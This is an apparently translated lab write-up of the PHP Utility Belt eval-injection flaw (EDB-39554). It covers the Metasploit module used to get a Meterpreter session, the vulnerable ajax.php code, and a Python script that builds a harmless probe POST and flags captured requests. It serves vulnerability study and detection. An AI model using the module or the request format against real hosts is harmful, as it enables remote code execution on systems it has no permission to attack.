PHP Utility Belt is a set of tools for PHP developers: it lets you test regular expressions and see the matches returned by preg_match and preg_match_all and the output of preg_replace; generate a random password made of two words, two digits, a capital letter and a symbol; serialize and unserialize data; format dates for testing mktime and strtotime, or convert a numeric timestamp; and, on a page of its own, run arbitrary PHP code.
Because it executes arbitrary PHP code, it is meant only for a test environment and must never be deployed in production.
The vulnerability is Exploit-DB ID 39554 (edb-id:39554).
The source code can be downloaded from: https://github.com/mboynes/php-utility-belt
Set up a lab in which the target machine has the IP address 192.168.248.129 and the attacker machine has the IP address 192.168.248.128.
After PHP Utility Belt has been deployed and is running on the target, it looks as follows.
Metasploit already ships an exploit module for this vulnerability, at the path
exploit/multi/http/php_utility_belt_rce
Load this module in msfconsole on the attacker machine.
Then set the payload.
Next, set the required options (at minimum the target host and the path at which the application is served).
Finally run the exploit command to launch the attack.
A Meterpreter session comes back, which shows that the attack succeeded.
Capturing the packets for the whole process gives the following.
The request is a POST whose parameter named `code` carries the entire attack payload. Looking at the vulnerable file, ajax.php, the problem is in the code snippet at lines 10 to 15:
The program first checks whether the `code` parameter is set and, if it is, passes it straight to eval(). eval() executes its argument as PHP code, and nothing in this code filters what the user sent, so whatever the attacker supplies in `code` is executed unconditionally as long as it is syntactically valid PHP. This is a textbook eval injection.
In a test environment such code is a convenience for programmers, but in a production environment it is very dangerous.
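To make the captured request concrete, here is an added Python example (not code from the original article, from PHP Utility Belt or from the Metasploit module) that builds the same kind of POST to ajax.php that the module sends, and that parses a captured request back into the PHP which eval() would execute. The probe it constructs is a harmless arithmetic expression, so the only thing a response reveals is whether the `code` field really reached eval(). The function names, the sample request and the default path /php-utility-belt/ajax.php are assumptions for the example; adjust the path to wherever the application is served.

```python
"""Build and inspect the POST request behind the PHP Utility Belt eval injection.

build_probe_request() produces a form POST whose `code` field is what ajax.php
hands to eval(); inspect_request() does the reverse for a request pulled from a
capture.  Everything here (names, sample capture, default path) is constructed
for this example and is not the project's or the Metasploit module's own code.
"""
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample: what a request from the exploit run looks like in a capture.
# The body decodes to the PHP `echo 1234*5678;`.
SAMPLE_CAPTURE = (
    "POST /php-utility-belt/ajax.php HTTP/1.1\r\n"
    "Host: 192.168.248.129\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 24\r\n"
    "\r\n"
    "code=echo+1234%2A5678%3B"
)


def make_probe(a: int = 1234, b: int = 5678) -> Tuple[str, str]:
    """Return (php_code, expected_output) for a harmless eval-confirming probe.

    Any pair of numbers works; the product only appears in the response if the
    code was actually evaluated, so it cannot be mistaken for an echoed input.
    """
    return f"echo {a}*{b};", str(a * b)


def build_probe_request(host: str, code: str,
                        path: str = "/php-utility-belt/ajax.php") -> str:
    """Return a raw HTTP/1.1 POST that carries `code` the way the exploit does."""
    body = urlencode({"code": code})  # form-encodes the PHP into the `code` field
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def inspect_request(raw: str) -> Optional[dict]:
    """Parse a raw HTTP request from a capture.

    Returns {"host", "path", "code"} when the request is a form POST to ajax.php
    carrying a `code` field (i.e. PHP that would reach eval()), otherwise None.
    """
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        return None
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    path = urlsplit(target).path
    if method.upper() != "POST" or not path.endswith("/ajax.php"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if "code" not in fields:
        return None
    return {"host": headers.get("host", ""), "path": path, "code": fields["code"][0]}


def confirms_eval(response_body: str, expected: str) -> bool:
    """True when the probe's computed result shows up in the server's reply."""
    return expected in response_body


if __name__ == "__main__":
    code, expected = make_probe()
    print(build_probe_request("192.168.248.129", code))
    print("captured PHP:", inspect_request(SAMPLE_CAPTURE)["code"])
    print("expected output if eval() ran:", expected)
```

Run against a lab host you own, the generated request either returns the product (the `code` field reached eval()) or it does not; on the defensive side, feeding captured requests through inspect_request flags any POST to ajax.php with a `code` field, which on a production host is never legitimate traffic.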
* Submitted by Navyofficer; when reprinting, please credit FreeBuf Hackers & Geeks (freebuf.com)